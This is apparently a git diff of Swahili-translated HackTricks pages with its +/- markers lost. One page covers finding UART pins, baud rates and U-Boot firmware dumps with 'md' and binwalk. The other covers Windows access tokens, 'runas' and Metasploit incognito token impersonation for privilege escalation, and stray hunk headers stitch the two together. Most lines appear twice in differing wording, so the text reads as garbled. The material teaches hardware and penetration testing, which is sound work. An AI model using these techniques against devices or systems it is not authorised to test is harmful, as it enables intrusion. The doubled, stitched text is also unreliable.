Kwa ujumla, mstari unashikiliwa juu (kwa thamani ya mantiki 1) wakati UART iko katika hali ya kupumzika. Kisha, ili kusisitiza mwanzo wa uhamisho wa data, mtumaji hutoa biti ya kuanza kwa mpokeaji, wakati ambapo ishara inashikiliwa chini (kwa thamani ya mantiki 0). Kisha, mtumaji hutoa biti tano hadi nane za data zinazohusisha ujumbe halisi, ikifuatiwa na biti ya ukaguzi wa usawa hiari na biti moja au mbili za kusimamisha (zenye thamani ya mantiki 1), kulingana na usanidi. Biti ya usawa, inayotumiwa kwa ukaguzi wa makosa, mara nyingi haionekani katika vitendo. Biti ya kusimamisha (au biti) inaashiria mwisho wa uhamisho.
Tuitie usanidi wa kawaida zaidi 8N1: biti nane za data, hakuna usawa, na biti moja ya kusimamisha. Kwa mfano, ikiwa tunataka kutuma herufi C, au 0x43 katika ASCII, katika usanidi wa UART wa 8N1, tungepeleka biti zifuatazo: 0 (biti ya kuanza); 0, 1, 0, 0, 0, 0, 1, 1 (thamani ya 0x43 kwa nambari ya binary), na 0 (biti ya kusimamisha).
Tuita usanidi wa kawaida zaidi 8N1: biti nane za data, hakuna usawa, na biti moja ya kusimamisha. Kwa mfano, ikiwa tunataka kutuma herufi C, au 0x43 katika ASCII, katika usanidi wa UART wa 8N1, tungepeleka biti zifuatazo: 0 (biti ya kuanza); 0, 1, 0, 0, 0, 0, 1, 1 (thamani ya 0x43 katika tarakilishi), na 0 (biti ya kusimamisha).
![](<../../.gitbook/assets/image (761).png>)
Vyombo vya vifaa vya kuwasiliana na UART:
Vyombo vya vifaa vya mawasiliano na UART:
* Kigeuzi cha USB-kwa-mfululizo
* Vigeuzi vyenye chips za CP2102 au PL2303
* Zana ya matumizi mengi kama: Bus Pirate, Adafruit FT232H, Shikra, au Attify Badge
* Zana ya aina nyingi kama: Pirate ya Bus, Adafruit FT232H, Shikra, au Bajeti ya Attify
### Kutambua Bandari za UART
UART ina bandari 4: **TX**(Tuma), **RX**(Pokea), **Vcc**(Voltage), na **GND**(Ground). Unaweza kupata bandari 4 zenye herufi za **`TX`** na **`RX`** **zilizoandikwa** kwenye PCB. Lakini ikiwa hakuna ishara, unaweza kuhitaji kujaribu kuzipata mwenyewe kwa kutumia **multimeter** au **logic analyzer**.
UART ina bandari 4: **TX**(Tuma), **RX**(Pokea), **Vcc**(Voltage), na **GND**(Ground). Unaweza kupata bandari 4 zenye herufi za **`TX`** na **`RX`** **zilizoandikwa** kwenye PCB. Lakini ikiwa hakuna ishara, unaweza kuhitaji kujaribu kuzipata mwenyewe kwa kutumia **multimeter** au **analyzer ya mantiki**.
Kwa **multimeter** na kifaa kimezimwa:
* Kutambua pin ya **GND** tumia mode ya **Continuity Test**, weka kichwa cha nyuma kwenye ardhi na jaribu na kichwa chekundu mpaka usikie sauti kutoka kwa multimeter. Pins kadhaa za GND zinaweza kupatikana kwenye PCB, kwa hivyo unaweza kuwa umepata au hujapata ile inayomilikiwa na UART.
* Kutambua **bandari ya VCC**, weka mode ya **DC voltage** na iweke hadi 20 V ya voltage. Kichwa cheusi kwenye ardhi na kichwa chekundu kwenye pin. Washa kifaa. Ikiwa multimeter inapima voltage thabiti ya 3.3 V au 5 V, umepata pin ya Vcc. Ikiwa unapata voltages nyingine, jaribu tena na bandari zingine.
* Kutambua **TX** **port**, **DC voltage mode** hadi 20 V ya voltage, kichwa cheusi kwenye ardhi, na kichwa chekundu kwenye pin, na uweke kifaa. Ikiwa unagundua voltage inabadilika kwa sekunde chache na kisha inadhibitika kwa thamani ya Vcc, labda umepata TX port. Hii ni kwa sababu ya kutuma data ya uchunguzi wakati wa kuwasha.
* **RX port** itakuwa ile karibu zaidi na zingine 3, ina mabadiliko madogo ya voltage na thamani ya chini zaidi ya jumla ya pini zote za UART.
* Kutambua pin ya **GND** tumia mode ya **Majaribio ya Uendelezaji**, weka kichwa cha nyuma kwenye ardhi na jaribu na kichwa chekundu mpaka usikie sauti kutoka kwa multimeter. Pins kadhaa za GND zinaweza kupatikana kwenye PCB, kwa hivyo unaweza kuwa umepata au hujapata ile inayomilikiwa na UART.
* Kutambua **bandari ya VCC**, weka mode ya **volts ya DC** na iweke hadi 20 V ya voltage. Kichwa cheusi kwenye ardhi na kichwa chekundu kwenye pin. Washa kifaa. Ikiwa multimeter inapima voltage ya kudumu ya 3.3 V au 5 V, umepata pin ya Vcc. Ikiwa unapata voltages zingine, jaribu tena na bandari zingine.
* Kutambua **TX** **bandari**, **mode ya voltage ya DC** hadi 20 V ya voltage, kichwa cheusi kwenye ardhi, na kichwa chekundu kwenye pin, na uweke kifaa. Ikiwa unagundua voltage inabadilika kwa sekunde chache na kisha inadhibitika kwa thamani ya Vcc, labda umepata bandari ya TX. Hii ni kwa sababu wakati wa kuwasha, inatuma data fulani ya uchunguzi.
* **Bandari ya RX** itakuwa ile karibu zaidi na zingine 3, ina mabadiliko madogo ya voltage na thamani ya chini zaidi kabisa ya pini zote za UART.
Unaweza kuchanganya pini za TX na RX na hakuna kitakachotokea, lakini ikiwa unachanganya GND na bandari ya VCC unaweza kuharibu mzunguko.
Unaweza kuchanganya bandari za TX na RX na hakuna kitakachotokea, lakini ikiwa unachanganya GND na bandari ya VCC unaweza kuharibu mzunguko.
Kwenye vifaa vingine vya lengo, bandari ya UART inaweza kuwa imelemazwa na mtengenezaji kwa kulemaza RX au TX au hata zote mbili. Katika kesi hiyo, inaweza kuwa na manufaa kufuatilia mawasiliano kwenye bodi ya mzunguko na kupata sehemu ya kuvunja. Kiashiria kikali cha kuthibitisha kutokuwepo kwa kugundua UART na kuvunja kwa mzunguko ni kuangalia dhamana ya kifaa. Ikiwa kifaa kimepelekwa na dhamana fulani, mtengenezaji huacha interfaces za uchunguzi (katika kesi hii, UART) na hivyo, lazima awe ameunganisha UART na ataiunganisha tena wakati wa kutatua hitilafu. Pins hizi za kuvunja zinaweza kuunganishwa kwa kusodolewa au nyaya za jumper.
Kwenye vifaa vya lengo, bandari ya UART inaweza kuwa imelemazwa na mtengenezaji kwa kulemaza RX au TX au hata zote mbili. Katika kesi hiyo, inaweza kuwa na manufaa kufuatilia mawasiliano kwenye bodi ya mzunguko na kupata sehemu ya kuvunja. Kiashiria kikali kuhusu kuthibitisha kutokuwepo kwa kugundua UART na kuvunjika kwa mzunguko ni kuangalia dhamana ya kifaa. Ikiwa kifaa kimepelekwa na dhamana fulani, mtengenezaji huacha interfaces za uchunguzi (katika kesi hii, UART) na hivyo, lazima awe amekataza UART na ataiunganisha tena wakati wa kutatua hitilafu. Pins hizi za kuvunja zinaweza kuunganishwa kwa kusodolewa au nyaya za jumper.
### Kutambua Kiwango cha Baud ya UART
Njia rahisi ya kutambua baud rate sahihi ni kutazama **pato la pin ya TX na kujaribu kusoma data**. Ikiwa data unayopokea haiwezi kusomwa, badilisha kwa baud rate inayofuata hadi data iweze kusomwa. Unaweza kutumia kigeuzi cha USB-kwa-mfululizo au kifaa cha matumizi mengi kama Bus Pirate kufanya hivi, pamoja na script msaidizi, kama vile [baudrate.py](https://github.com/devttys0/baudrate/). Viwango vya baud vya kawaida ni 9600, 38400, 19200, 57600, na 115200.
Njia rahisi ya kutambua baud rate sahihi ni kutazama **pato la pin ya TX na kujaribu kusoma data**. Ikiwa data unayopokea haiwezi kusomwa, badilisha kiwango cha baud kinachofuata hadi data iweze kusomwa. Unaweza kutumia kigeuzi cha USB-kwa-mfululizo au kifaa cha aina nyingi kama Bus Pirate kufanya hivi, pamoja na script msaidizi, kama vile [baudrate.py](https://github.com/devttys0/baudrate/). Viwango vya baud vya kawaida ni 9600, 38400, 19200, 57600, na 115200.
{% hint style="danger" %}
Ni muhimu kutambua kwamba katika itifaki hii unahitaji kuunganisha TX ya kifaa kimoja na RX ya kingine!
@ -69,7 +69,7 @@ Ni muhimu kutambua kwamba katika itifaki hii unahitaji kuunganisha TX ya kifaa k
## Kigeuzi cha CP210X UART kwenda TTY
Chip ya CP210X hutumiwa kwenye bodi nyingi za prototyping kama NodeMCU (na esp8266) kwa Mawasiliano ya Mfululizo. Vigeuzi hivi ni vya bei nafuu na vinaweza kutumika kuunganisha kwenye kiolesura cha UART cha lengo. Kifaa kina pins 5: 5V, GND, RXD, TXD, 3.3V. Hakikisha kuunganisha voltage kama inavyoungwa mkono na lengo ili kuepuka uharibifu wowote. Hatimaye unganisha pin ya RXD ya Kigeuzi kwa TXD ya lengo na pin ya TXD ya Kigeuzi kwa RXD ya lengo.
Chip ya CP210X hutumiwa kwenye bodi nyingi za prototyping kama NodeMCU (na esp8266) kwa Mawasiliano ya Mfululizo. Vigeuzi hivi ni vya bei rahisi na vinaweza kutumika kuunganisha kwenye kiolesura cha UART cha lengo. Kifaa kina pins 5: 5V, GND, RXD, TXD, 3.3V. Hakikisha kuunganisha voltage kama inavyoungwa mkono na lengo ili kuepuka uharibifu wowote. Hatimaye unganisha pin ya RXD ya Kigeuzi kwa TXD ya lengo na pin ya TXD ya Kigeuzi kwa RXD ya lengo.
Ikiwa kigeuzi hakigunduliwi, hakikisha madereva ya CP210X yamefungwa kwenye mfumo wa mwenyeji. Mara tu kigeuzi kinapogunduliwa na kuunganishwa, zana kama picocom, minicom au screen zinaweza kutumika.
@ -87,15 +87,15 @@ minicom -s
```
Configure mazingira kama baudrate na jina la kifaa katika chaguo la `Serial port setup`.
Baada ya usanidi, tumia amri `minicom` kuanza kupata Konzi ya UART.
Baada ya usanidi, tumia amri `minicom` kuanza kupata Konsoli ya UART.
## UART Kupitia Arduino UNO R3 (Makaratasi ya Chip ya Atmel 328p yanayoweza kuondolewa)
Ikiwa viunganishi vya UART Serial hadi USB havipatikani, Arduino UNO R3 inaweza kutumika na udukuzi wa haraka. Kwa kuwa Arduino UNO R3 kawaida inapatikana popote, hii inaweza kuokoa muda mwingi.
Ikiwa viunganishi vya UART Serial hadi USB havipatikani, Arduino UNO R3 inaweza kutumika na udukuzi wa haraka. Kwa kuwa Arduino UNO R3 kawaida inapatikana mahali popote, hii inaweza kuokoa muda mwingi.
Arduino UNO R3 ina kiunganishi cha USB hadi Serial kilichojengwa kwenye bodi yenyewe. Ili kupata uunganisho wa UART, tuvute nje chipu ya mikrokontrola ya Atmel 328p kutoka kwenye bodi. Udukuzi huu unafanya kazi kwenye toleo la Arduino UNO R3 lenye Atmel 328p ambayo haijasindikwa kwenye bodi (toleo la SMD linatumika). Unganisha pin ya RX ya Arduino (Pin ya Dijitali 0) kwenye pin ya TX ya Kiolesura cha UART na pin ya TX ya Arduino (Pin ya Dijitali 1) kwenye pin ya RX ya kiolesura cha UART.
Arduino UNO R3 ina adapta ya USB hadi Serial iliyojengwa kwenye bodi yenyewe. Ili kupata uunganisho wa UART, tuvute nje chipu ya mikrokontrola ya Atmel 328p kutoka kwenye bodi. Udukuzi huu unafanya kazi kwenye toleo la Arduino UNO R3 lenye Atmel 328p ambayo haijasuluhishwa kwenye bodi (toleo la SMD linatumika). Unganisha pin ya RX ya Arduino (Pin ya Dijitali 0) kwa pin ya TX ya Kiolesura cha UART na pin ya TX ya Arduino (Pin ya Dijitali 1) kwa pin ya RX ya kiolesura cha UART.
Hatimaye, inashauriwa kutumia Arduino IDE kupata Konzi ya Serial. Katika sehemu ya `zana` kwenye menyu, chagua chaguo la `Serial Console` na weka kiwango cha baud kulingana na kiolesura cha UART.
Hatimaye, inapendekezwa kutumia Arduino IDE kupata Konsoli ya Serial. Katika sehemu ya `zana` kwenye menyu, chagua chaguo la `Konsoli ya Serial` na weka kiwango cha baud kulingana na kiolesura cha UART.
## Bus Pirate
@ -173,13 +173,13 @@ waiting a few secs to repeat....
```
## Kudondosha Firmware na Konsoli ya UART
Konsoli ya UART hutoa njia nzuri ya kufanya kazi na firmware ya msingi katika mazingira ya runtime. Lakini wakati upatikanaji wa Konsoli ya UART ni wa kusoma tu, inaweza kuleta vizuizi vingi. Katika vifaa vingi vilivyowekwa, firmware hufungwa katika EEPROMs na kutekelezwa kwenye processors zenye kumbukumbu ya muda mfupi. Hivyo, firmware inabaki kuwa ya kusoma tu tangu firmware ya awali wakati wa utengenezaji iko ndani ya EEPROM yenyewe na faili mpya zingepotea kutokana na kumbukumbu ya muda mfupi. Hivyo, kudondosha firmware ni juhudi muhimu wakati wa kufanya kazi na firmware zilizowekwa.
Konsoli ya UART hutoa njia nzuri ya kufanya kazi na firmware ya msingi katika mazingira ya runtime. Lakini wakati upatikanaji wa Konsoli ya UART ni wa kusoma tu, inaweza kuleta vizuizi vingi. Katika vifaa vingi vilivyowekwa, firmware hufungwa katika EEPROMs na kutekelezwa kwenye processors zenye kumbukumbu ya muda. Hivyo, firmware inabaki kuwa ya kusoma tu tangu firmware ya awali wakati wa utengenezaji iko ndani ya EEPROM yenyewe na faili mpya zingepotea kutokana na kumbukumbu ya muda. Hivyo, kudondosha firmware ni juhudi muhimu wakati wa kufanya kazi na firmware zilizowekwa.
Kuna njia nyingi za kufanya hivi na sehemu ya SPI inashughulikia njia za kutoa firmware moja kwa moja kutoka kwenye EEPROM na vifaa mbalimbali. Ingawa, inapendekezwa kujaribu kwanza kudondosha firmware na UART kwani kudondosha firmware na vifaa vya kimwili na mwingiliano wa nje kunaweza kuwa hatari.
Kudondosha firmware kutoka kwenye Konsoli ya UART kunahitaji kupata kwanza upatikanaji wa bootloaders. Wauzaji maarufu wengi hutumia <b>uboot</b> (Universal Bootloader) kama bootloader yao ya kupakia Linux. Hivyo, kupata upatikanaji wa <b>uboot</b> ni lazima.
Ili kupata upatikanaji wa bootloader ya <b>boot</b>, unganisha bandari ya UART kwenye kompyuta na tumia mojawapo ya zana za Konsoli ya Serial na weka ugavi wa umeme kwa kifaa kimekatwa. Mara tu usanidi uko tayari, bonyeza Kitufe cha Kuingia na kishike. Hatimaye, unganisha ugavi wa umeme kwa kifaa na ruhusu ianze.
Ili kupata upatikanaji wa bootloader ya <b>boot</b>, unganisha bandari ya UART kwenye kompyuta na tumia mojawapo ya zana za Konsoli ya Serial na weka ugavi wa umeme kwa kifaa bila kuunganisha. Mara tu usanidi uko tayari, bonyeza kitufe cha Enter na kishike. Hatimaye, unganisha ugavi wa umeme kwa kifaa na ruhusu ianze.
Kufanya hivi kutavuruga <b>uboot</b> kutoka kupakia na kutoa menyu. Inapendekezwa kuelewa amri za <b>uboot</b> na kutumia menyu ya msaada kuorodhesha. Hii inaweza kuwa amri ya `help`. Kwa kuwa wauzaji tofauti hutumia mipangilio tofauti, ni muhimu kuelewa kila moja yao kivyake.
@ -187,7 +187,7 @@ Kawaida, amri ya kudondosha firmware ni:
```
md
```
which stands for "memory dump". Hii itadump kumbukumbu (Maudhui ya EEPROM) kwenye skrini. Inashauriwa kurekodi pato la Konzi ya Serial kabla ya kuanza mchakato ili kukamata kumbukumbu.
which stands for "memory dump". Hii itadump kumbukumbu (Maudhui ya EEPROM) kwenye skrini. Inashauriwa kurekodi pato la Konzi ya Serial kabla ya kuanza mchakato ili kukamata kumbukumbu ya kumbukumbu.
Hatimaye, tuondoe data yote isiyohitajika kutoka kwenye faili la logi na uhifadhi faili kama `jina la faili.rom` na tumie binwalk kutoa maudhui:
```
@ -195,15 +195,15 @@ binwalk -e <filename.rom>
```
Hii itaorodhesha maudhui yanayowezekana kutoka kwenye EEPROM kulingana na saini zilizopatikana kwenye faili ya hex.
Ingawa, ni muhimu kuzingatia kwamba sio mara zote kwamba <b>uboot</b> imefunguliwa hata ikiwa inatumika. Ikiwa Kitufe cha Kuingia hakifanyi chochote, angalia funguo tofauti kama vile Kitufe cha Nafasi, n.k. Ikiwa bootloader imefungwa na haikatishwi, njia hii haitafanya kazi. Ili kuthibitisha ikiwa <b>uboot</b> ndio bootloader wa kifaa, angalia matokeo kwenye Konsoli ya UART wakati wa kuanza kifaa. Inaweza kutaja <b>uboot</b> wakati wa kuanza.
Ingawa, ni muhimu kuzingatia kwamba sio mara zote kwamba <b>uboot</b> iko wazi hata ikiwa inatumika. Ikiwa Kitufe cha Kuingia hakifanyi chochote, angalia funguo tofauti kama Kitufe cha Nafasi, n.k. Ikiwa bootloader imefungwa na haikatishwi, njia hii haitafanya kazi. Ili kuthibitisha ikiwa <b>uboot</b> ndio bootloader wa kifaa, angalia matokeo kwenye Konsoli ya UART wakati wa kuanza kifaa. Inaweza kutaja <b>uboot</b> wakati wa kuanza.
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumiwa na **dark-web** inayotoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumiwa na **dark-web** inayotoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi ya kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:

View file

@ -2,23 +2,23 @@
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **fuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **programu hasidi za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kuangalia tovuti yao na kujaribu injini yao **bure** kwa:
@ -28,7 +28,7 @@ Unaweza kuangalia tovuti yao na kujaribu injini yao **bure** kwa:
## Vitambulisho vya Kufikia
Kila **mtumiaji aliyeingia** kwenye mfumo **ana vitambulisho vya kufikia na habari za usalama** kwa kikao hicho cha kuingia. Mfumo hutoa kitambulisho cha kufikia wakati mtumiaji anaingia. **Kila mchakato unaoendeshwa** kwa niaba ya mtumiaji **una nakala ya kitambulisho cha kufikia**. Kitambulisho hicho huchambua mtumiaji, vikundi vya mtumiaji, na mamlaka ya mtumiaji. Kitambulisho pia kina SID ya kuingia (Kitambulisho cha Usalama) kinachoidhinisha kikao cha kuingia cha sasa.
Kila **mtumiaji aliyeingia** kwenye mfumo **ana kitambulisho cha kufikia na habari za usalama** kwa kikao hicho cha kuingia. Mfumo hutoa kitambulisho cha kufikia wakati mtumiaji anaingia. **Kila mchakato unaoendeshwa** kwa niaba ya mtumiaji **una nakala ya kitambulisho cha kufikia**. Kitambulisho hicho hufafanua mtumiaji, vikundi vya mtumiaji, na mamlaka ya mtumiaji. Kitambulisho pia kina SID ya kuingia (Kitambulisho cha Usalama) kinachotambua kikao cha kuingia cha sasa.
Unaweza kuona habari hii kwa kutekeleza `whoami /all`
```
@ -80,12 +80,12 @@ Au kutumia _Process Explorer_ kutoka Sysinternals (chagua mchakato na ufikie kic
### Msimamizi wa eneo
Wakati msimamizi wa eneo anapoingia, **vitambulisho viwili vya ufikivu** vinajengwa: Kimoja chenye haki za msimamizi na kingine chenye haki za kawaida. **Kwa chaguo-msingi**, wakati mtumiaji huyu anatekeleza mchakato, kile chenye **haki za kawaida** (si msimamizi) **hutumiwa**. Wakati mtumiaji huyu anapojaribu **kutekeleza** kitu **kama msimamizi** ("Tekeleza kama Msimamizi" kwa mfano) **UAC** itatumika kuomba idhini.\
Wakati msimamizi wa eneo anapoingia, **vitambulisho viwili vya ufikivu** vinajengwa: Kimoja chenye haki za msimamizi na kingine chenye haki za kawaida. **Kwa chaguo-msingi**, wakati mtumiaji huyu anatekeleza mchakato, kile chenye **haki za kawaida** (si msimamizi) **hutumiwa**. Wakati mtumiaji huyu anajaribu **kutekeleza** kitu **kama msimamizi** ("Tekeleza kama Msimamizi" kwa mfano) **UAC** itatumika kuomba idhini.\
Ikiwa unataka [**kujifunza zaidi kuhusu UAC soma ukurasa huu**](../authentication-credentials-uac-and-efs/#uac)**.**
### Uigizaji wa mtumiaji wa vibali
### Uigizaji wa mtumiaji wa vyeti
Ikiwa una **vibali halali vya mtumiaji mwingine**, unaweza **kuunda** kikao kipya cha kuingia kwa kutumia vibali hivyo:
Ikiwa una **vyeti halali vya mtumiaji mwingine**, unaweza **kuunda** kikao kipya cha kuingia kwa kutumia vyeti hivyo:
```
runas /user:domain\username cmd.exe
```
@ -100,39 +100,38 @@ Hii ni muhimu ikiwa una sifa muhimu za kupata vitu kwenye mtandao lakini sifa hi
Kuna aina mbili za vyeti zilizopo:
* **Cheti Kuu**: Hufanya kama uwakilishi wa sifa za usalama za mchakato. Uundaji na uunganishaji wa vyeti vya msingi na michakato ni vitendo vinavyohitaji mamlaka ya juu, ikisisitiza kanuni ya kutenganisha mamlaka. Kwa kawaida, huduma ya uthibitishaji inahusika na uundaji wa cheti, wakati huduma ya kuingia inashughulikia uhusishaji wake na kabati la mfumo wa mtumiaji. Ni muhimu kutambua kwamba michakato huirithi cheti kuu cha mchakato wao wa mzazi wakati wa uundaji.
* **Cheti cha Uigizaji**: Humpa programu ya seva uwezo wa kuchukua kitambulisho cha mteja kwa muda kwa kupata vitu salama. Mfumo huu umegawanywa katika viwango vinne vya uendeshaji:
* **Anonim**: Humpa seva ufikiaji kama wa mtumiaji asiyejulikana.
* **Cheti Kuu**: Hufanya kama uwakilishi wa sifa za usalama za mchakato. Uundaji na uunganishaji wa vyeti vya msingi na michakato ni vitendo vinavyohitaji mamlaka ya juu, ikisisitiza kanuni ya kutenganisha mamlaka. Kawaida, huduma ya uthibitishaji inahusika na uundaji wa cheti, wakati huduma ya kuingia inashughulikia uhusishaji wake na kabati la mfumo wa mtumiaji. Ni muhimu kutambua kwamba michakato huirithi cheti kuu cha mchakato wao wa mzazi wakati wa uundaji.
* **Cheti cha Uigizaji**: Humpa programu ya seva kuchukua kitambulisho cha mteja kwa muda kwa kupata vitu salama. Mfumo huu umegawanywa katika viwango vinne vya uendeshaji:
* **Anonim**: Hutoa ufikiaji wa seva kama wa mtumiaji asiyejulikana.
* **Utambuzi**: Inaruhusu seva kuthibitisha kitambulisho cha mteja bila kutumia kwa upatikanaji wa vitu.
* **Uigizaji**: Inawezesha seva kufanya kazi chini ya kitambulisho cha mteja.
* **Uteuzi**: Kama Uigizaji lakini inajumuisha uwezo wa kuendeleza dhana hii ya kitambulisho kwa mifumo ya mbali ambayo seva inashirikiana nayo, ikisimamia uhifadhi wa sifa.
#### Uigizaji wa Vyeti
#### Uigize Vyeti
Kwa kutumia moduli ya _**incognito**_ ya metasploit ikiwa una mamlaka za kutosha unaweza kwa urahisi **kuorodhesha** na **kuigiza** vyeti vingine **vyeti**. Hii inaweza kuwa muhimu kufanya **vitendo kana kwamba wewe ni mtumiaji mwingine**. Pia unaweza **kupandisha vyeo** kwa kutumia mbinu hii.
Kwa kutumia moduli ya _**incognito**_ ya metasploit ikiwa una mamlaka za kutosha unaweza kwa urahisi **kuorodhesha** na **kuigiza** vyeti vingine **.** Hii inaweza kuwa muhimu kufanya **vitendo kana kwamba wewe ni mtumiaji mwingine**. Pia unaweza **kupandisha vyeo** kwa kutumia mbinu hii.
### Vyeo vya Mamlaka
Jifunze ni **vyeo vya mamlaka** vipi vinaweza kutumiwa vibaya kwa ajili ya kupandisha vyeo:
Jifunze ni **vipaumbele vya vyeti vinavyoweza kutumiwa kwa kupandisha vyeo:**
{% content-ref url="privilege-escalation-abusing-tokens.md" %}
[privilege-escalation-abusing-tokens.md](privilege-escalation-abusing-tokens.md)
{% endcontent-ref %}
Angalia [**vyeo vyote vya mamlaka vinavyowezekana na baadhi ya ufafanuzi kwenye ukurasa huu wa nje**](https://github.com/gtworek/Priv2Admin).
Tazama [**vipaumbele vyote vya vyeti vinavyowezekana na baadhi ya ufafanuzi kwenye ukurasa huu wa nje**](https://github.com/gtworek/Priv2Admin).
## Marejeo
Jifunze zaidi kuhusu vyeti katika mafunzo haya: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) na [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
### [WhiteIntel](https://whiteintel.io)
## WhiteIntel
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** inayotoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **programu hasidi za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** inayotoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi inayochukua habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
@ -142,10 +141,10 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikitangazwa kwenye HackTricks**? au ungependa kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) **Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **nifuate** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
